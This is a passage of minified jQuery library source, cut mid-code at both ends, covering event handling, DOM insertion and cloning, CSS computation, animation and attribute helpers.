0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>=0:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button;return null==a.pageX&&null!=b.clientX&&(c=a.target.ownerDocument||l,d=c.documentElement,e=c.body,a.pageX=b.clientX+(d&&d.scrollLeft||e&&e.scrollLeft||0)-(d&&d.clientLeft||e&&e.clientLeft||0),a.pageY=b.clientY+(d&&d.scrollTop||e&&e.scrollTop||0)-(d&&d.clientTop||e&&e.clientTop||0)),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},fix:function(a){if(a[n.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=W.test(e)?this.mouseHooks:V.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new n.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=l),3===a.target.nodeType&&(a.target=a.target.parentNode),g.filter?g.filter(a,f):a},special:{load:{noBubble:!0},focus:{trigger:function(){return this!==_()&&this.focus?(this.focus(),!1):void 0},delegateType:"focusin"},blur:{trigger:function(){return this===_()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return"checkbox"===this.type&&this.click&&n.nodeName(this,"input")?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=n.extend(new n.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?n.event.trigger(e,null,b):n.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},n.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?Z:$):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={isDefaultPrevented:$,isPropagationStopped:$,isImmediatePropagationStopped:$,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=Z,a&&a.preventDefault&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=Z,a&&a.stopPropagation&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=Z,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!n.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.focusinBubbles||n.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){n.event.simulate(b,a.target,n.event.fix(a),!0)};n.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=L.access(d,b);e||d.addEventListener(a,c,!0),L.access(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=L.access(d,b)-1;e?L.access(d,b,e):(d.removeEventListener(a,c,!0),L.remove(d,b))}}}),n.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(g in a)this.on(g,b,c,a[g],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=$;else if(!d)return this;return 1===e&&(f=d,d=function(a){return n().off(a),f.apply(this,arguments)},d.guid=f.guid||(f.guid=n.guid++)),this.each(function(){n.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=$),this.each(function(){n.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){n.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?n.event.trigger(a,b,c,!0):void 0}});var aa=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,ba=/<([\w:]+)/,ca=/<|&#?\w+;/,da=/<(?:script|style|link)/i,ea=/checked\s*(?:[^=]|=\s*.checked.)/i,fa=/^$|\/(?:java|ecma)script/i,ga=/^true\/(.*)/,ha=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,ia={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ia.optgroup=ia.option,ia.tbody=ia.tfoot=ia.colgroup=ia.caption=ia.thead,ia.th=ia.td;function ja(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function ka(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function la(a){var b=ga.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function ma(a,b){for(var c=0,d=a.length;d>c;c++)L.set(a[c],"globalEval",!b||L.get(b[c],"globalEval"))}function na(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(L.hasData(a)&&(f=L.access(a),g=L.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}M.hasData(a)&&(h=M.access(a),i=n.extend({},h),M.set(b,i))}}function oa(a,b){var c=a.getElementsByTagName?a.getElementsByTagName(b||"*"):a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function pa(a,b){var c=b.nodeName.toLowerCase();"input"===c&&T.test(a.type)?b.checked=a.checked:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}n.extend({clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=oa(h),f=oa(a),d=0,e=f.length;e>d;d++)pa(f[d],g[d]);if(b)if(c)for(f=f||oa(a),g=g||oa(h),d=0,e=f.length;e>d;d++)na(f[d],g[d]);else na(a,h);return g=oa(h,"script"),g.length>0&&ma(g,!i&&oa(a,"script")),h},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,k=b.createDocumentFragment(),l=[],m=0,o=a.length;o>m;m++)if(e=a[m],e||0===e)if("object"===n.type(e))n.merge(l,e.nodeType?[e]:e);else if(ca.test(e)){f=f||k.appendChild(b.createElement("div")),g=(ba.exec(e)||["",""])[1].toLowerCase(),h=ia[g]||ia._default,f.innerHTML=h[1]+e.replace(aa,"<$1></$2>")+h[2],j=h[0];while(j--)f=f.lastChild;n.merge(l,f.childNodes),f=k.firstChild,f.textContent=""}else l.push(b.createTextNode(e));k.textContent="",m=0;while(e=l[m++])if((!d||-1===n.inArray(e,d))&&(i=n.contains(e.ownerDocument,e),f=oa(k.appendChild(e),"script"),i&&ma(f),c)){j=0;while(e=f[j++])fa.test(e.type||"")&&c.push(e)}return k},cleanData:function(a){for(var b,c,d,e,f=n.event.special,g=0;void 0!==(c=a[g]);g++){if(n.acceptData(c)&&(e=c[L.expando],e&&(b=L.cache[e]))){if(b.events)for(d in b.events)f[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);L.cache[e]&&delete L.cache[e]}delete M.cache[c[M.expando]]}}}),n.fn.extend({text:function(a){return J(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&(this.textContent=a)})},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=ja(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=ja(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?n.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||n.cleanData(oa(c)),c.parentNode&&(b&&n.contains(c.ownerDocument,c)&&ma(oa(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(oa(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return J(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!da.test(a)&&!ia[(ba.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(aa,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(oa(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,n.cleanData(oa(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,m=this,o=l-1,p=a[0],q=n.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&ea.test(p))return this.each(function(c){var d=m.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(c=n.buildFragment(a,this[0].ownerDocument,!1,this),d=c.firstChild,1===c.childNodes.length&&(c=d),d)){for(f=n.map(oa(c,"script"),ka),g=f.length;l>j;j++)h=c,j!==o&&(h=n.clone(h,!0,!0),g&&n.merge(f,oa(h,"script"))),b.call(this[j],h,j);if(g)for(i=f[f.length-1].ownerDocument,n.map(f,la),j=0;g>j;j++)h=f[j],fa.test(h.type||"")&&!L.access(h,"globalEval")&&n.contains(i,h)&&(h.src?n._evalUrl&&n._evalUrl(h.src):n.globalEval(h.textContent.replace(ha,"")))}return this}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),g=e.length-1,h=0;g>=h;h++)c=h===g?this:this.clone(!0),n(e[h])[b](c),f.apply(d,c.get());return this.pushStack(d)}});var qa,ra={};function sa(b,c){var d,e=n(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:n.css(e[0],"display");return e.detach(),f}function ta(a){var b=l,c=ra[a];return c||(c=sa(a,b),"none"!==c&&c||(qa=(qa||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=qa[0].contentDocument,b.write(),b.close(),c=sa(a,b),qa.detach()),ra[a]=c),c}var ua=/^margin/,va=new RegExp("^("+Q+")(?!px)[a-z%]+$","i"),wa=function(b){return b.ownerDocument.defaultView.opener?b.ownerDocument.defaultView.getComputedStyle(b,null):a.getComputedStyle(b,null)};function xa(a,b,c){var d,e,f,g,h=a.style;return c=c||wa(a),c&&(g=c.getPropertyValue(b)||c[b]),c&&(""!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),va.test(g)&&ua.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0!==g?g+"":g}function ya(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d=l.documentElement,e=l.createElement("div"),f=l.createElement("div");if(f.style){f.style.backgroundClip="content-box",f.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===f.style.backgroundClip,e.style.cssText="border:0;width:0;height:0;top:0;left:-9999px;margin-top:1px;position:absolute",e.appendChild(f);function g(){f.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",f.innerHTML="",d.appendChild(e);var g=a.getComputedStyle(f,null);b="1%"!==g.top,c="4px"===g.width,d.removeChild(e)}a.getComputedStyle&&n.extend(k,{pixelPosition:function(){return g(),b},boxSizingReliable:function(){return null==c&&g(),c},reliableMarginRight:function(){var b,c=f.appendChild(l.createElement("div"));return c.style.cssText=f.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",c.style.marginRight=c.style.width="0",f.style.width="1px",d.appendChild(e),b=!parseFloat(a.getComputedStyle(c,null).marginRight),d.removeChild(e),f.removeChild(c),b}})}}(),n.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var za=/^(none|table(?!-c[ea]).+)/,Aa=new RegExp("^("+Q+")(.*)$","i"),Ba=new RegExp("^([+-])=("+Q+")","i"),Ca={position:"absolute",visibility:"hidden",display:"block"},Da={letterSpacing:"0",fontWeight:"400"},Ea=["Webkit","O","Moz","ms"];function Fa(a,b){if(b in a)return b;var c=b[0].toUpperCase()+b.slice(1),d=b,e=Ea.length;while(e--)if(b=Ea[e]+c,b in a)return b;return d}function Ga(a,b,c){var d=Aa.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Ha(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+R[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+R[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+R[f]+"Width",!0,e))):(g+=n.css(a,"padding"+R[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+R[f]+"Width",!0,e)));return g}function Ia(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=wa(a),g="border-box"===n.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=xa(a,b,f),(0>e||null==e)&&(e=a.style[b]),va.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Ha(a,b,c||(g?"border":"content"),d,f)+"px"}function Ja(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=L.get(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&S(d)&&(f[g]=L.access(d,"olddisplay",ta(d.nodeName)))):(e=S(d),"none"===c&&e||L.set(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=xa(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;return b=n.cssProps[h]||(n.cssProps[h]=Fa(i,h)),g=n.cssHooks[b]||n.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b]:(f=typeof c,"string"===f&&(e=Ba.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(n.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||n.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Fa(a.style,h)),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=xa(a,b,d)),"normal"===e&&b in Da&&(e=Da[b]),""===c||c?(f=parseFloat(e),c===!0||n.isNumeric(f)?f||0:e):e}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?za.test(n.css(a,"display"))&&0===a.offsetWidth?n.swap(a,Ca,function(){return Ia(a,b,d)}):Ia(a,b,d):void 0},set:function(a,c,d){var e=d&&wa(a);return Ga(a,c,d?Ha(a,b,d,"border-box"===n.css(a,"boxSizing",!1,e),e):0)}}}),n.cssHooks.marginRight=ya(k.reliableMarginRight,function(a,b){return b?n.swap(a,{display:"inline-block"},xa,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+R[d]+b]=f[d]||f[d-2]||f[0];return e}},ua.test(a)||(n.cssHooks[a+b].set=Ga)}),n.fn.extend({css:function(a,b){return J(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=wa(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)},a,b,arguments.length>1)},show:function(){return Ja(this,!0)},hide:function(){return Ja(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){S(this)?n(this).show():n(this).hide()})}});function Ka(a,b,c,d,e){return new Ka.prototype.init(a,b,c,d,e)}n.Tween=Ka,Ka.prototype={constructor:Ka,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=Ka.propHooks[this.prop];return a&&a.get?a.get(this):Ka.propHooks._default.get(this)},run:function(a){var b,c=Ka.propHooks[this.prop];return this.options.duration?this.pos=b=n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):this.pos=b=a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Ka.propHooks._default.set(this),this}},Ka.prototype.init.prototype=Ka.prototype,Ka.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[n.cssProps[a.prop]]||n.cssHooks[a.prop])?n.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Ka.propHooks.scrollTop=Ka.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},n.fx=Ka.prototype.init,n.fx.step={};var La,Ma,Na=/^(?:toggle|show|hide)$/,Oa=new RegExp("^(?:([+-])=|)("+Q+")([a-z%]*)$","i"),Pa=/queueHooks$/,Qa=[Va],Ra={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=Oa.exec(b),f=e&&e[3]||(n.cssNumber[a]?"":"px"),g=(n.cssNumber[a]||"px"!==f&&+d)&&Oa.exec(n.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,n.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function Sa(){return setTimeout(function(){La=void 0}),La=n.now()}function Ta(a,b){var c,d=0,e={height:a};for(b=b?1:0;4>d;d+=2-b)c=R[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function Ua(a,b,c){for(var d,e=(Ra[b]||[]).concat(Ra["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function Va(a,b,c){var d,e,f,g,h,i,j,k,l=this,m={},o=a.style,p=a.nodeType&&S(a),q=L.get(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,l.always(function(){l.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=n.css(a,"display"),k="none"===j?L.get(a,"olddisplay")||ta(a.nodeName):j,"inline"===k&&"none"===n.css(a,"float")&&(o.display="inline-block")),c.overflow&&(o.overflow="hidden",l.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],Na.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}m[d]=q&&q[d]||n.style(a,d)}else j=void 0;if(n.isEmptyObject(m))"inline"===("none"===j?ta(a.nodeName):j)&&(o.display=j);else{q?"hidden"in q&&(p=q.hidden):q=L.access(a,"fxshow",{}),f&&(q.hidden=!p),p?n(a).show():l.done(function(){n(a).hide()}),l.done(function(){var b;L.remove(a,"fxshow");for(b in m)n.style(a,b,m[b])});for(d in m)g=Ua(p?q[d]:0,d,l),d in q||(q[d]=g.start,p&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function Wa(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function Xa(a,b,c){var d,e,f=0,g=Qa.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=La||Sa(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:La||Sa(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(Wa(k,j.opts.specialEasing);g>f;f++)if(d=Qa[f].call(j,a,k,j.opts))return d;return n.map(k,Ua,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(Xa,{tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],Ra[c]=Ra[c]||[],Ra[c].unshift(b)},prefilter:function(a,b){b?Qa.unshift(a):Qa.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(S).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=Xa(this,n.extend({},a),f);(e||L.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=L.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&Pa.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=L.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(Ta(b,!0),a,d,e)}}),n.each({slideDown:Ta("show"),slideUp:Ta("hide"),slideToggle:Ta("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=0,c=n.timers;for(La=n.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||n.fx.stop(),La=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){Ma||(Ma=setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){clearInterval(Ma),Ma=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(a,b){return a=n.fx?n.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a=l.createElement("input"),b=l.createElement("select"),c=b.appendChild(l.createElement("option"));a.type="checkbox",k.checkOn=""!==a.value,k.optSelected=c.selected,b.disabled=!0,k.optDisabled=!c.disabled,a=l.createElement("input"),a.value="t",a.type="radio",k.radioValue="t"===a.value}();var Ya,Za,$a=n.expr.attrHandle;n.fn.extend({attr:function(a,b){return J(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(a&&3!==f&&8!==f&&2!==f)return typeof a.getAttribute===U?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),d=n.attrHooks[b]||(n.expr.match.bool.test(b)?Za:Ya)),
-void 0===c?d&&"get"in d&&null!==(e=d.get(a,b))?e:(e=n.find.attr(a,b),null==e?void 0:e):null!==c?d&&"set"in d&&void 0!==(e=d.set(a,c,b))?e:(a.setAttribute(b,c+""),c):void n.removeAttr(a,b))},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(E);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)&&(a[d]=!1),a.removeAttribute(c)},attrHooks:{type:{set:function(a,b){if(!k.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}}}),Za={set:function(a,b,c){return b===!1?n.removeAttr(a,c):a.setAttribute(c,c),c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=$a[b]||n.find.attr;$a[b]=function(a,b,d){var e,f;return d||(f=$a[b],$a[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,$a[b]=f),e}});var _a=/^(?:input|select|textarea|button)$/i;n.fn.extend({prop:function(a,b){return J(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[n.propFix[a]||a]})}}),n.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(a,b,c){var 